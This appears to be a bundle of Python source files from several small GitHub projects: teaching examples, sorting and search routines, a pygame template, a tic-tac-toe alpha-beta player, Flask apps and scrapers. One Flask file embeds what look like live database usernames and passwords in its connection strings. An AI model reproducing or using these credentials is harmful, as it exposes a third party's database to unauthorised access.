def Private(*privates): # privates in enclosing scope
def onDecorator(aClass): # aClass in enclosing scope
class onInstance: # wrapped in instance attribute
def __init__(self, *args, **kargs):
# 把 Doubler 类的实例包装在 onInstance 实例属性 wrapped 上
self.wrapped = aClass(*args, **kargs)
# 这里会拦截类外面取属性的操作
# 比如 label,data
def __getattr__(self, attr): # My attrs don't call getattr
trace('get:', attr) # Others assumed in wrapped
if attr in privates: # 如果该属性在私有属性元组中
# 抛出异常
raise TypeError('private attribute fetch: ' + attr)
else: # 如果该属性没有在私有属性元组,直接从被包装的对象中取属性
return getattr(self.wrapped, attr)
# 这里会拦截类外面设置属性的操作
def __setattr__(self, attr, value): # Outside accesses
trace('set:', attr, value) # Others run normally
# 如果设置的是 wrapped
# 说明是初始化的时候,onInstance 实例需要设置这个属性
# 那么不要拦截,通过属性字典设置
if attr == 'wrapped': # Allow my attrs
self.__dict__[attr] = value # Avoid looping
# 如果设置的属性在私有属性元组中
elif attr in privates:
# 抛出异常
raise TypeError('private attribute change: ' + attr)
else:
# 否则的话,不是私有属性,把设置操作路由(分发)给 self.wrapped
# 即 Doubler 实例
setattr(self.wrapped, attr, value) # Wrapped obj attrs
return onInstance # Or use __dict__
return onDecorator
if __name__ == '__main__':
traceMe = True
# 这里设置了两个私有属性,data 和 size
@Private('data', 'size') # Doubler = Private(...)(Doubler)
class Doubler:
# 类内部的属性操作不会被拦截
# 因为类内部的 self 就是 Doubler 实例,而不是 onInstance 实例
# Doubler 所有属性的赋值与取值都是开放的
def __init__(self, label, start):
self.label = label # Accesses inside the subject class
self.data = start # Not intercepted: run normally
def size(self):
return len(self.data) # Methods run with no checking
def double(self): # Because privacy not inherited
for i in range(self.size()):
self.data[i] = self.data[i] * 2
def display(self):
print('%s => %s' % (self.label, self.data))
# 实际上是调用了 onInstance 类进行创建
# 创建过程中调用了 onInstance 类的初始化方法 __init__
# 设置 self.wrapped 的时候触发了 onInstance 类的 __setattr__ 方法
X = Doubler('X is', [1, 2, 3]) # label 被设置成 X is,data 被设置成 [1, 2, 3]
Y = Doubler('Y is', [-10, -20, -30]) # label 被设置成 Y is,data 被设置成 [-10, -20, -30]
print()
"""
[set: wrapped <__main__.Doubler object at 0x000001726FA74278>]
[set: wrapped <__main__.Doubler object at 0x000001726FA742E8>]
"""
# The following all succeed
# 外部访问,触发 onInstance 的 __getattr__
# 不是私有属性,正常输出
print(X.label) # Accesses outside subject class
print()
"""
[get: label]
X is
"""
X.display(); X.double(); X.display() # Intercepted: validated, delegated
print()
"""
[get: label]
X is
[get: display]
X is => [1, 2, 3]
[get: double]
[get: display]
X is => [2, 4, 6]
"""
print(Y.label)
print()
"""
[get: label]
Y is
"""
Y.display()
Y.double()
Y.label = 'Spam'
Y.display()
"""
[get: display]
Y is => [-10, -20, -30]
[get: double]
[set: label Spam]
[get: display]
Spam => [-20, -40, -60]
"""
# The following all fail properly
"""
print(X.size()) # prints "TypeError: private attribute fetch: size"
print(X.data)
X.data = [1, 1, 1]
X.size = lambda S: 0
print(Y.data)
print(Y.size())
"""
``` |
{
"source": "jpch89/likepython",
"score": 3
} |
#### File: likepython/3/lk_020_nonlocal.py
```python
def test():
num = 10
def test2():
num = 666
print(num)
print(num)
test2()
print(num)
return test2
result = test()
"""
10
666
10
"""
def test():
num = 10
def test2():
nonlocal num
num = 666
print(num)
print(num)
test2()
print(num)
return test2
result = test()
"""
10
666
666
"""
``` |
{
"source": "jpch89/picalgo",
"score": 4
} |
#### File: jpch89/picalgo/pa01_binary_search.py
```python
def binary_search(array, item):
"""返回 item 在 array 中的下标,没找到返回 None。"""
low = 0
high = len(array) - 1
while low <= high:
mid = (low + high) // 2
guess = array[mid]
if guess == item:
return mid
elif guess > item:
high = mid - 1
else:
low = mid + 1
return None
if __name__ == '__main__':
array = [1, 2, 3, 4, 5, 6, 7, 8]
item = 7
print(binary_search(array, item))
"""
6
"""
```
#### File: jpch89/picalgo/pa02_selection_sort.py
```python
def find_smallest(arr):
"""返回数组中最小值的索引。"""
smallest = arr[0]
smallest_i = 0
for i in range(1, len(arr)):
if arr[i] < smallest:
smallest = arr[i]
smallest_i = i
return smallest_i
def selection_sort(arr):
"""对数组进行排序。"""
result = []
for i in range(len(arr)):
smallest_i = find_smallest(arr)
result.append(arr.pop(smallest_i))
return result
if __name__ == '__main__':
arr = [1, 4, 2, 7, 5, 8, 6, 3]
result = selection_sort(arr)
print(result)
"""
[1, 2, 3, 4, 5, 6, 7, 8]
"""
``` |
{
"source": "jpch89/pygamekidscancode",
"score": 3
} |
#### File: pygamekidscancode/pygame_template/sprite_example.py
```python
import pygame
import random
WIDTH = 800
HEIGHT = 600
FPS = 30
# define colors
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
class Player(pygame.sprite.Sprite):
# sprite for the player
def __init__(self):
# pygame.sprite.Sprite.__init__(self)
super().__init__()
self.image = pygame.Surface((50, 50))
self.image.fill(GREEN)
self.rect = self.image.get_rect()
self.rect.center = (WIDTH / 2, HEIGHT / 2)
def update(self):
self.rect.x += 5
if self.rect.left > WIDTH:
self.rect.right = 0
# initialize pygame and create window
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption('我的游戏')
clock = pygame.time.Clock()
all_sprites = pygame.sprite.Group()
player = Player()
all_sprites.add(player)
# Game loop
running = True
while running:
# keep loop running at the right speed
clock.tick(FPS)
# Process input (events)
for event in pygame.event.get():
# check for closing window
if event.type == pygame.QUIT:
running = False
# Update
all_sprites.update()
# Draw / Render
screen.fill(BLACK)
all_sprites.draw(screen)
# *after* drawing everything, flip the display
pygame.display.flip()
pygame.quit()
``` |
{
"source": "jpchagas/AdversarialSearchAlgorithm",
"score": 3
} |
#### File: AdversarialSearchAlgorithm/players/player_alphabeta.py
```python
from player import Player
from util import *
# ==========================================
# Player Alphabeta
# ==========================================
class AlphabetaPlayer(Player):
# ------------------------------------------
# Initialize
# ------------------------------------------
def __init__(self, symbol):
super(AlphabetaPlayer, self).__init__(symbol)
self.alpha = float('inf') * (-1)
self.beta = float('inf')
# ------------------------------------------
# Get next move
# ------------------------------------------
def get_next_move(self, board):
maxAction = None
maxValue = float('inf') * (-1)
succs = self.successors((board,0),self.me())
for succ in succs:
minVal = self.minValue(succ)
if minVal > maxValue:
maxValue = minVal
maxAction = succ[2]
return maxAction
def successors(self,state,sym):
available = find_empty_cells(state[0])
moves = state[1]+1
succs = []
for action in available:
nBoard = list(state[0])
nBoard[action] = sym
succs.append((nBoard,moves,action,len(available)-1))
return succs
def minValue(self,state):
if self.isTerminal(state):
return self.utility(state)
v = float('inf')
succs = self.successors(state,self.opp())
for succ in succs:
v = min(v,self.maxValue(succ))
if v <= self.alpha:
return v
self.beta = min(v,self.beta)
return v
def maxValue(self,state):
if self.isTerminal(state):
return self.utility(state)
v = float('inf') * (-1)
succs = self.successors(state,self.me())
for succ in succs:
v = max(v,self.minValue(succ))
if v >= self.beta:
return v
self.alpha = max(self.alpha,v)
return v
def isTerminal(self,state):
return (state[3] <= 0) or (find_winner(state[0])[0] != None)
def utility(self,state):
winner = find_winner(state[0])[0]
if winner == None:
return 0
if winner == self.me():
return 10 - (state[1])
if winner == self.opp():
return (state[1]) - 10
```
#### File: jpchagas/AdversarialSearchAlgorithm/util.py
```python
EMPTY = None
O = "O"
X = "X"
DRAW = False # If there is no winner
# ------------------------------------------
# Find winner
# ------------------------------------------
def find_winner(board):
for c in [
# Rows
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
# Cols
[0, 3, 6],
[1, 4, 7],
[2, 5, 8],
# Diagonals
[0, 4, 8],
[2, 4, 6]
]:
# Check if a combination is filled by the same symbol
if board[c[0]] and board[c[0]] == board[c[1]] and board[c[0]] == board[c[2]]:
return (board[c[0]], c)
return (None, [])
# ------------------------------------------
# Find empty cells
# ------------------------------------------
def find_empty_cells(board):
return [index for index in range(9) if board[index] is None]
# ------------------------------------------
# Print board
# ------------------------------------------
def print_board(board):
content = list(board)
content = [" " if play == None else play for i, play in enumerate(content)]
print """
% | % | %
% | % | %
% | % | %
""".replace("%", "{}").format(*content)
``` |
{
"source": "jpchagas/enriching-customer-database",
"score": 2
} |
#### File: jpchagas/enriching-customer-database/application.py
```python
from flask import Flask , redirect
from model.models import Base , People, Address
from flask_sqlalchemy import SQLAlchemy
import requests
import json
import atexit
from apscheduler.scheduler import Scheduler
application = Flask(__name__)
cron = Scheduler(daemon=True)
application.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://j4h6pfu6j2hsgjsx:jnrhopjytnncg7ij@<EMAIL>ysz6rn1f.cbetxkdyhwsb.us-east-1.<EMAIL>:3306/tqq7jin5tgyki2cl'
#application.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://dba:pegasos93@localhost:3306/rbsdb'
db = SQLAlchemy(application)
cron.start()
@cron.interval_schedule(minutes=1)
def batch():
#requests.get('http://127.0.0.1:5000/update')
requests.get('https://enriching-customer-database.herokuapp.com//update')
print('Requested')
@application.before_first_request
def setup():
#Base.metadata.drop_all(bind=db.engine)
Base.metadata.create_all(bind=db.engine)
#new_people = People('<NAME>', '<EMAIL>','username','password','gender','photo')
#db.session.add(new_people)
#db.session.commit()
#db.session.add(Address(new_people.id, 'teste',1234,'teste','teste'))
#db.session.commit()
@application.route('/update')
def update():
resp = requests.get('https://randomuser.me/api/').json()['results'][0]
new_people = People(resp['name']['first'] + ' ' + resp['name']['last'],
resp['email'],
resp['login']['username'],
resp['login']['password'],
resp['gender'],
resp['picture']['large'])
db.session.add(new_people)
db.session.commit()
new_address = Address(new_people.id,
resp['location']['street']['name'],
resp['location']['street']['number'],
resp['location']['city'],
resp['location']['state'])
db.session.add(new_address)
db.session.commit()
return redirect('/')
@application.route('/')
def root():
person = db.session.query(People).all()
return u"<br>".join([u"{0}: {1}".format(p.name, p.email) for p in person])
@application.route('/updateapi')
def updateapi():
#resp = peoplecontroller.update_api()
#return resp
pass
@application.route('/userbygenderbycity')
def userbygenderbycity():
p ={}
a = 1
info = db.session.query(Address.city,People.gender,db.func.count(People.id)).join(Address, People.id == Address.pessoa_id).group_by(Address.city,People.gender).all()
for i in info:
p[a] = {'city':i[0],
'gender':i[1],
'amout': i[2]}
a = a + 1
return json.dumps(p,indent=2)
atexit.register(lambda: cron.shutdown(wait=False))
if __name__ == "__main__":
application.debug = True
application.run()
``` |
{
"source": "jpchagas/navigation-tool-time-prediction-improvement",
"score": 3
} |
#### File: jpchagas/navigation-tool-time-prediction-improvement/models.py
```python
from sqlalchemy import Column, Integer, String, ForeignKey, DateTime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Events(Base):
__tablename__='events'
id = Column(Integer,primary_key=True)
begin = Column(DateTime,nullable=False)
end = Column(DateTime)
description = Column(String(200),nullable=False)
attend = Column(Integer, nullable=False)
establishments_id = Column(Integer,ForeignKey("establishments.id"),nullable=False)
def __init__(self,begin=None, end=None, description=None,attend=None,establishments_id=None):
self.begin=begin
self.end=end
self.description=description
self.attend=attend
self.establishments_id=establishments_id
def __repr__(self):
pass
class Establishments(Base):
__tablename__='establishments'
id = Column(Integer,primary_key=True)
name = Column(String(50),nullable=False)
address_id = Column(Integer,ForeignKey("adresses.id"),nullable=False)
def __init__(self,name=None,address_id=None):
self.name=name
self.address_id=address_id
def __repr__(self):
pass
class Users(Base):
__tablename__='users'
id = Column(Integer,primary_key=True)
fullname = Column(String(50),nullable=False)
username = Column(String(50),nullable=False)
email = Column(String(50),nullable=False)
def __init__(self,fullname=None,username=None,email=None):
self.fullname=fullname
self.username=username
self.email=email
def __repr__(self):
pass
class Adresses(Base):
__tablename__='adresses'
id = Column(Integer,primary_key=True)
#cep = Column(Integer,nullable=False)
cidade = Column(String(50),nullable=False)
bairro = Column(String(50),nullable=False)
estado = Column(String(50),nullable=False)
logradouro = Column(String(50),nullable=False)
numero = Column(String(50),nullable=False)
def __init__(self,cidade=None,bairro=None,estado=None,logradouro=None,numero=None):
#self.cep=cep
self.cidade=cidade
self.bairro=bairro
self.estado=estado
self.logradouro=logradouro
self.numero=numero
def __repr__(self):
pass
class EventsList(Base):
__tablename__='evenslist'
user_id = Column(Integer,ForeignKey("users.id"),primary_key=True)
event_id = Column(Integer,ForeignKey("events.id"),primary_key=True)
def __init__(self):
pass
def __repr__(self):
pass
#class Directions(Base):
# __tablename__ = 'directions'
# def __init__(self):
# pass
# def __repr__(self):
# pass
``` |
{
"source": "jpchagas/stock-exchange-analysis",
"score": 3
} |
#### File: jpchagas/stock-exchange-analysis/app.py
```python
import streamlit as st
import numpy as np
import pandas as pd
from pandas_datareader import data as wb
import matplotlib.pyplot as plt
import datetime
from dao.news_dao import NewsDAO
from dao.stock_dao import StockDAO
def main():
stock = st.sidebar.text_input("Enter your stock code","ITSA4.SA")
start_date = st.sidebar.date_input('Start date',datetime.date.today()-datetime.timedelta(days=30))
end_date = st.sidebar.date_input('End date',datetime.date.today())
st.title("Stock Monitor")
stock_name = StockDAO().getStockName(stock)
news_source = NewsDAO().getNews(stock_name,start_date,end_date)
news_list = NewsDAO().create_news(news_source)
news_df = pd.DataFrame(NewsDAO().getJsonList(news_list))
price = StockDAO().getStock(stock,start_date,end_date)
st.dataframe(price)
st.line_chart(price)
ac1 = price
size = len(ac1)-1
xn = ac1[size]
x1 = ac1[0]
st.header('Valor Inicial: %s' % round(x1,2))
st.header('Valor Atual: %s' % round(xn,2))
rentabilidade = round(((xn/x1)-1)*100,2)
st.header('Rentabilidade: %s' % rentabilidade)
#st.text(rentabilidade)
st.dataframe(news_df)
if __name__ == '__main__':
main()
```
#### File: stock-exchange-analysis/model/news.py
```python
class News():
def __init__(self, news_source):
self.source = news_source['source']['name']
self.author = news_source['author']
self.title = news_source['title']
self.description = news_source['description']
self.url = news_source['url']
self.publishedAt = news_source['publishedAt']
self.resume = news_source['content']
'''
"source":{
"id":"globo",
"name":"Globo"
},
"author":"None",
"title":"Petrobras inicia fase vinculante para venda da subsidiária Pbio",
"description":"SÃO PAULO (Reuters) - A Petrobras iniciou nesta segunda-feira a fase não vinculante do processo de venda da subsidiária integral Petrobras Biocombustível (Pbio), informou a empresa em comunicado ao mercado.Fundada em...Leia mais",
"url":"https://extra.globo.com/noticias/economia/petrobras-inicia-fase-vinculante-para-venda-da-subsidiaria-pbio-24564990.html",
"urlToImage":"https://extra.globo.com/skins/extra/images/extra-face-1.jpg",
"publishedAt":"2020-08-03T22:04:00Z",
"content":"SÃO PAULO (Reuters) - A Petrobras iniciou nesta segunda-feira a fase não vinculante do processo de venda da subsidiária integral Petrobras Biocombustível (Pbio), informou a empresa em comunicado ao m… [+1120 chars]"
},
'''
def getJson(self):
json = {
"source":self.source,
"title":self.title,
"resume":self.resume,
"description":self.description,
"url":self.url,
"author":self.author,
"publishedAt":self.publishedAt,
}
return json
```
#### File: jpchagas/stock-exchange-analysis/stock.py
```python
import numpy as np
import pandas as pd
from pandas_datareader import data as wb
import matplotlib.pyplot as plt
stocks = ['ABEV3.SA','MGLU3.SA','BBAS3.SA','BRKM5.SA','BBDC4.SA','AZUL4.SA','ITUB4.SA','BBDC3.SA','VALE3.SA','PETR4.SA','RENT3.SA','SUZB3.SA','CIEL3.SA','GOLL4.SA','GNDI3.SA','BRAP4.SA','B3SA3.SA','BTOW3.SA','EQTL3.SA']
#TickerA='ITSA4.SA'
#TickerB='FLRY3.SA'
#TickerC='LREN3.SA'
prices=pd.DataFrame()
#tickers = [TickerA, TickerB, TickerC]
print(prices)
def getStock(s):
print(s)
return wb.DataReader(s, data_source='yahoo', start='2020-8-9')['Adj Close']
stock = 'ITSA4.SA'
print(getStock(stock))
#for s in stocks:
#prices[s]=wb.DataReader(s, data_source='yahoo', start='2020-3-9')['Adj Close']
#(ac1/ac1.iloc[0]*100).plot(figsize=(15,5))
#plt.ylabel('NORMALIZED PRICES')
#plt.xlabel('DATE')
#plt.show()
``` |
{
"source": "jpchagas/treinamento-flask",
"score": 2
} |
#### File: jpchagas/treinamento-flask/app.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/inicio')
def ola():
return render_template('lista.html');
app.run()
``` |
{
"source": "jpchagas/xepa-crawler",
"score": 2
} |
#### File: jpchagas/xepa-crawler/app.py
```python
from flask import Flask
import os
app = Flask(__name__)
@app.route('/')
def hello():
os.chdir(os.getcwd() + "/xepacrawler")
os.system('scrapy crawl ceasars')
return 'Hello, World!'
if __name__ == "__main__":
app.run()
```
#### File: xepa-crawler/tests/test_global.py
```python
class TestGlobal:
def test_insert_prices(self):
assert True
def test_get_prices(self):
assert True
def test_get_price(self):
assert True
```
#### File: xepacrawler/utils/url_helper.py
```python
from .date_helper import DateHelper
class UrlHelper:
def __init__(self):
self.dh = DateHelper()
#'http://ceasa.rs.gov.br/tabcotacao/02-03-2021/'
def current_url(self):
urls = []
prefix = r'http://ceasa.rs.gov.br/tabcotacao/'
data = self.dh.get_current_date()
url = prefix + data.strftime('%d-%m-%Y') + '/'
url1 = prefix + 'cotacao-' + data.strftime('%d-%m-%Y') + '/'
urls.append(url)
urls.append(url1)
return urls
def range_urls(self, begin, end):
urls = []
prefix = r'http://ceasa.rs.gov.br/tabcotacao/'
for data in self.dh.get_dates_range(begin, end):
url = prefix + data.strftime('%d-%m-%Y') + '/'
url1 = prefix + 'cotacao-' + data.strftime('%d-%m-%Y') + '/'
urls.append(url)
urls.append(url1)
return urls
#self.dh.get_dates_range(begin, end)
``` |
{
"source": "jpchagas/xepa-service",
"score": 3
} |
#### File: src/routes/route_unit.py
```python
from flask import Blueprint, request
from src.service.service_unit import UnitService
route_unit = Blueprint('unit', __name__)
us = UnitService()
@route_unit.route("/unit", methods=['GET'])
def get_units():
return us.get_units()
@route_unit.route("/unit", methods=['POST'])
def post_units():
return us.insert_unit(request.json)
@route_unit.route("/unit/<description>", methods=['GET'])
def get_unit(description):
return us.get_unit(description)
@route_unit.route("/unit/<description>", methods=['DELETE'])
def delete_unit(description):
return us.delete_unit(description)
@route_unit.route("/unit/<description>", methods=['UPDATE'])
def update_unit(description):
return us.update_unit(description)
```
#### File: src/service/service_product.py
```python
from src.repository.repository_product import ProductRepository
import json
class ProductService:
def __init__(self):
self.pr = ProductRepository()
def insert_product(self, body):
p = self.pr.insert(body['description'])
return json.dumps({"id": p.id,
"description": p.description
})
def get_products(self):
products = self.pr.get_all()
products_tuples = [(u.id, u.description) for u in products]
return json.dumps(dict(products_tuples))
def get_product(self, description):
p = self.pr.get_one(description)
return json.dumps({"id": p.id,
"description": p.description
})
def update_product(self, description):
self.pr.update(description)
def delete_product(self, description):
self.pr.delete(description)
```
#### File: tests/service/test_price.py
```python
from src.service.service_price import PriceService
class TestPrice:
def test_insert_prices(self):
assert True
def test_get_prices(self):
assert True
def test_get_price(self):
assert True
``` |
{
"source": "jpchato/data-structures-and-algorithms-python",
"score": 4
} |
#### File: challenges/insertion_sort/test_insertion_sort.py
```python
from insertion_sort import insertion_sort
def test_insertion_sort():
array_one = [5, 26, 9, 4, 3]
actual = insertion_sort(array_one)
expected = [3, 4, 5, 9, 26]
assert actual == expected
def test_negative_insertion_sort():
array_two = [-1, 2, 7, -100, 42]
actual = insertion_sort(array_two)
expected = [-100, -1, 2, 7, 42]
assert actual == expected
def test_duplicates_insertion_sort():
array_three = [4, 1, 2, 2, 4, -23, -100, 1]
actual = insertion_sort(array_three)
expected = [-100, -23, 1, 1, 2, 2, 4, 4]
assert actual == expected
# print(insertion_sort([5, 26, 9, 4, 3]))
```
#### File: challenges/ll_merge/ll_merge.py
```python
def mergeLists(self, other_list):
list1_curr = self.head
list2_curr = other_list.head
# This line of code checks to ensure that there are available positions in curr
while list1_curr != None and list2_curr != None
# Save next pointers
# Creating new variables which save next pointers
list1_next = list1_curr.next
list2_next = list2_curr.next
# Makes list2_curr as next of list1_curr
list2_curr.next = list1_next # changes the next pointer of list2_curr
list1_curr.next = list2_curr # changes the next pointer of list1_curr
# update current pointers for current iteration
# In my own words, I think these lines below are resetting the values to their original values so we can loop again in the while
list1_curr = list1_next
list2_curr = list2_next
other_list.head = list2_curr
```
#### File: site-packages/pytest_watch/util.py
```python
import os
import sys
from contextlib import contextmanager
@contextmanager
def silence():
"""
Silence stdout and stderr in a 'with' block.
"""
old_stdout = sys.stdout
old_stderr = sys.stderr
nullfd = open(os.devnull, 'w')
sys.stdout = nullfd
sys.stderr = nullfd
try:
yield
except Exception:
raise
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
nullfd.close()
``` |
{
"source": "jpchavat/hn-tops-topics",
"score": 3
} |
#### File: jpchavat/hn-tops-topics/hn-tops-topics.py
```python
import requests_html
from colorconsole import terminal
from collections import defaultdict
import re
import argparse
parser = argparse.ArgumentParser(description='# hn-tops-topics - Scrap the tops HN news and filters by topics\n'
'#\n'
'# Author: @jupachuy - github.com/jpchavat', prog='hn-tops-topic\n')
parser.add_argument('-p', '--max-pages', help='maximum amount of pages to scrap', default=3, type=int)
parser.add_argument('-n', '--max-news', help='maximum amount of news to scrap', default=15, type=int)
parser.add_argument('keywords', help='list of keywords to search while scrapping')
args = parser.parse_args()
#KEYWORDS = 'python,golang,bitcoin,ripple,xrp,stellar,xlm,crypto,uruguay'
KEYWORDS = args.keywords.split(',')
MAX_PAGES = args.max_pages
MAX_NEWS = args.max_news
def itruncate(string, width):
if len(string) > width:
string = string[:width-3] + '...'
return string
# Screen confs
screen = terminal.get_terminal()
screen.clear()
screen.set_title("HN tops topics")
current_line = 0
def get_current_line():
global current_line
current_line += 1
return current_line
# Print title
screen.xterm256_set_bk_color(208)
screen.xterm256_set_fg_color(234)
screen.print_at(0, get_current_line(), "|-----------------|")
screen.print_at(0, get_current_line(), "| HN tops topics |")
screen.print_at(0, get_current_line(), "|_________________|")
screen.underline()
get_current_line()
screen.print_at(0, get_current_line(), "Topic(s): %s" % " - ".join(KEYWORDS))
get_current_line()
screen.reset()
session = requests_html.Session()
# Build the regex with keywords
topics_regex = r"\b{}".format("|\\b".join(KEYWORDS))
# Scrap the web
topic_news_amount = 0
topic_news = defaultdict(list)
page = 1
while page <= MAX_PAGES and topic_news_amount < MAX_NEWS:
r = session.get('https://news.ycombinator.com/news?p=%s' % page)
news = ((x.text, x.absolute_links.pop()) for x in r.html.find('.storylink'))
for title, link in news:
if topic_news_amount == MAX_NEWS:
break
topic_matches = list(re.finditer(topics_regex, title, re.IGNORECASE))
#print("Finding '{}' in '{}'".format(topics_regex, title))
if topic_matches:
for topic in (x.group(0) for x in topic_matches):
topic_news[topic.upper()].append((title, link, page))
topic_news_amount += 1
page += 1
# Print the results
for topic, news in topic_news.items():
screen.xterm256_set_bk_color(208)
screen.xterm256_set_fg_color(234)
screen.print_at(0, get_current_line(), topic.upper())
screen.reset()
for num, (title, link, page) in enumerate(news):
line_to_write = get_current_line()
txt = "{:>3d} [P{:>2d}] ".format(num + 1, page)
screen.print_at(1, line_to_write, txt)
col = len(txt) + 1
txt = "{:<50s} ".format(itruncate(title, 50))
screen.print_at(col, line_to_write, txt)
col += len(txt)
txt = "{}".format(link)
screen.print_at(col, line_to_write, txt)
get_current_line()
screen.print_at(0, get_current_line(), "END.\n")
screen.reset()
``` |
{
"source": "jpchdiaz/Mongo-DB-Web-Scraping",
"score": 3
} |
#### File: jpchdiaz/Mongo-DB-Web-Scraping/app.py
```python
from flask import Flask, render_template, redirect
from flask_pymongo import pymongo
import scrape_mars
# create instance of Flask app
app = Flask(__name__)
# Create connection to Mongo
client = pymongo.MongoClient()
db = client.mars_db
collection = db.mars_data
# create route that renders index.html template and finds documents from mongo
@app.route("/")
def home():
# Find data
martian = list(db.collection.find())
print(martian)
# return template and data
return render_template("index.html", martian=martian)
# Route that will trigger scrape functions
@app.route("/scrape")
def scrape():
# db.collection.remove({})
martian = scrape_mars.scrape()
# db.mars_data.insert_one(martian)
db.collection.update(
{},
martian,
upsert=True
)
return redirect("http://127.0.0.1:5000", code=302)
if __name__ == "__main__":
app.run(debug=True)
```
#### File: jpchdiaz/Mongo-DB-Web-Scraping/scrape_mars.py
```python
from splinter import Browser
from bs4 import BeautifulSoup as bs
import re
import pandas as pd
def init_browser():
# @NOTE: Replace the path with your actual path to the chromedriver
executable_path = {"executable_path": "chromedriver.exe"}
return Browser("chrome", **executable_path, headless=False)
def scrape():
#empty dictionary
mars_scrape = {}
#Mars News
browser = init_browser()
url = 'https://mars.nasa.gov/news/'
browser.visit(url)
for x in range(1, 2):
html = browser.html
soup = bs(html, 'html.parser')
titles = soup.find_all('div', class_='list_text')
for title in titles:
news_title = title.find('div', class_='content_title').find('a').text
news_print = title.find('div', class_='article_teaser_body').text
mars_scrape['news_title'] = news_title
mars_scrape['news_print'] = news_print
#JPL Featured Image
url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'
browser.visit(url)
for x in range(1, 2):
html = browser.html
soup = bs(html, 'html.parser')
featured_image = soup.find('article')['style']
url_extract = re.search("'.*'", featured_image).group(0).replace("'", "")
featured_image_url = (f'https://www.jpl.nasa.gov{url_extract}')
mars_scrape['featured_image_url'] = featured_image_url
#Mars Weather
url = 'https://twitter.com/marswxreport?lang=en'
browser.visit(url)
for x in range(1, 2):
html = browser.html
soup = bs(html, 'html.parser')
tweets = soup.find_all('div', class_='js-tweet-text-container')
for tweet in tweets:
mars_weather = tweet.find('p').text
mars_scrape['mars_weather'] = mars_weather
#Mars Facts
url = 'http://space-facts.com/mars/'
tables = pd.read_html(url)
df = tables[0]
df.columns = ['', 'Mars']
df.set_index('', inplace=True)
html_table = df.to_html()
html_table = html_table.replace('\n', '')
mars_scrape['html_table'] = html_table
#Mars Hemispheres
cerberus_url = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/cerberus_enhanced'
schiaparelli_url = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/schiaparelli_enhanced'
syrtis_url = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/syrtis_major_enhanced'
marineris_url ='https://astrogeology.usgs.gov/search/map/Mars/Viking/valles_marineris_enhanced'
def image_scraper(url):
browser.visit(url)
html = browser.html
soup = bs(html, 'html.parser')
downloads = soup.find_all('div', class_='downloads')
for images in downloads:
scraped_imgs = images.find('a')['href']
return scraped_imgs
hemisphere_image_urls = [
{"title": "Valles Marineris Hemisphere", "img_url": image_scraper(cerberus_url)},
{"title": "Cerberus Hemisphere", "img_url": image_scraper(schiaparelli_url)},
{"title": "Schiaparelli Hemisphere", "img_url": image_scraper(syrtis_url)},
{"title": "Syrtis Major Hemisphere", "img_url": image_scraper(marineris_url)},
]
mars_scrape['hemisphere_image_urls'] = hemisphere_image_urls
return mars_scrape
``` |
{
"source": "jpchen/pgoapi",
"score": 3
} |
#### File: jpchen/pgoapi/model.py
```python
import logging
import os
import time
from peewee import Model, MySQLDatabase, SqliteDatabase, InsertQuery,\
IntegerField, CharField, DoubleField, BooleanField,\
DateTimeField, OperationalError
from datetime import datetime, timedelta
from base64 import b64encode
from . import config
from .utils import get_pokemon_name, get_args, send_to_webhook
from .transform import transform_from_wgs_to_gcj
from .customLog import printPokemon
log = logging.getLogger(__name__)
args = get_args()
class BaseModel(Model):
class Meta:
database = init_database()
@classmethod
def get_all(cls):
results = [m for m in cls.select().dicts()]
if args.china:
for result in results:
result['latitude'], result['longitude'] = \
transform_from_wgs_to_gcj(
result['latitude'], result['longitude'])
return results
class Pokemon(BaseModel):
# We are base64 encoding the ids delivered by the api
# because they are too big for sqlite to handle
encounter_id = CharField(primary_key=True, max_length=50)
spawnpoint_id = CharField()
pokemon_id = IntegerField()
latitude = DoubleField()
longitude = DoubleField()
disappear_time = DateTimeField()
@classmethod
def get_active(cls, swLat, swLng, neLat, neLng):
if swLat is None or swLng is None or neLat is None or neLng is None:
query = (Pokemon
.select()
.where(Pokemon.disappear_time > datetime.utcnow())
.dicts())
else:
query = (Pokemon
.select()
.where((Pokemon.disappear_time > datetime.utcnow()) &
(Pokemon.latitude >= swLat) &
(Pokemon.longitude >= swLng) &
(Pokemon.latitude <= neLat) &
(Pokemon.longitude <= neLng))
.dicts())
pokemons = []
for p in query:
p['pokemon_name'] = get_pokemon_name(p['pokemon_id'])
if args.china:
p['latitude'], p['longitude'] = \
transform_from_wgs_to_gcj(p['latitude'], p['longitude'])
pokemons.append(p)
return pokemons
@classmethod
def get_active_by_id(cls, ids, swLat, swLng, neLat, neLng):
if swLat is None or swLng is None or neLat is None or neLng is None:
query = (Pokemon
.select()
.where((Pokemon.pokemon_id << ids) &
(Pokemon.disappear_time > datetime.utcnow()))
.dicts())
else:
query = (Pokemon
.select()
.where((Pokemon.pokemon_id << ids) &
(Pokemon.disappear_time > datetime.utcnow()) &
(Pokemon.latitude >= swLat) &
(Pokemon.longitude >= swLng) &
(Pokemon.latitude <= neLat) &
(Pokemon.longitude <= neLng))
.dicts())
pokemons = []
for p in query:
p['pokemon_name'] = get_pokemon_name(p['pokemon_id'])
if args.china:
p['latitude'], p['longitude'] = \
transform_from_wgs_to_gcj(p['latitude'], p['longitude'])
pokemons.append(p)
return pokemons
``` |
{
"source": "jpchen/pyro-models",
"score": 2
} |
#### File: pyro_models/misc/ma2.py
```python
import torch
import pyro
import pyro.distributions as dist
def init_vector(name, dims=None):
return pyro.sample(name, dist.Normal(torch.zeros(dims), 0.2 * torch.ones(dims)).to_event(1))
def validate_data_def(data):
assert 'T' in data, 'variable not found in data: key=T'
assert 'y' in data, 'variable not found in data: key=y'
# initialize data
T = data["T"]
y = data["y"]
def init_params(data):
params = {}
return params
def model(data, params):
# initialize data
T = data["T"]
y = data["y"]
# model block
mu = pyro.sample("mu", dist.HalfCauchy(2.5))
